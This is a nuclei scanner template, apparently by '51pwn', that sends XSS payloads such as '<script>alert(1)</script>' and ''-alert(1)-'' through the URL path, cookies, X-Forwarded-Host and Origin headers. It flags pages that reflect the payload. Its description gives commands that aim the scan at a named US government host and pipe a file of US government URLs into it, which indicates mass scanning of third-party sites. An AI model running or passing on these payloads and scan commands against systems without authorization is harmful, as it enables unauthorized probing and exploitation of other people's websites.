id: XSS_test

info:
  name: CVE-XSS_test-23752
  author: 51pwn
  severity: critical
  description: |
    XSS_test
    nuclei -duc -t $PWD/config/51pwn/XSS_test.yaml -u https://calendar.fan.gov -debug
    cat atckData/us_gov_httpx.json|jq '.url'|sed 's/"//g'|nuclei -duc -t $PWD/config/51pwn/XSS_test.yaml -v
  reference:
    - https://portswigger.net/research/web-cache-entanglement
    - https://51pwn.com
  tags: web,cve,2023

requests:
  - raw:
      - |+
        GET //?"><script>alert(1)</script> HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Cookie: language='-alert(1)-';
        X-Forwarded-Host:'-alert(1)-'
        origin: '-alert(1)-'
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36


      - |+
        GET /%2F?"><script>alert(1)</script> HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Cookie: language='-alert(1)-';
        X-Forwarded-Host:'-alert(1)-'
        origin: '-alert(1)-'
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36



      - |+
        GET /(A("><script>alert(1)</script>))/ HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Cookie: language='-alert(1)-';
        X-Forwarded-Host:'-alert(1)-'
        origin: '-alert(1)-'
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36


    unsafe: true
    # pipeline-concurrent-connections: 40
    # pipeline-requests-per-connection: 25000
    cookie-reuse: true
    req-condition: true
    matchers-condition: and
    stop-at-first-match: true
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "<script>alert(1)</script>"
          - "'-alert(1)-'"
        condition: or
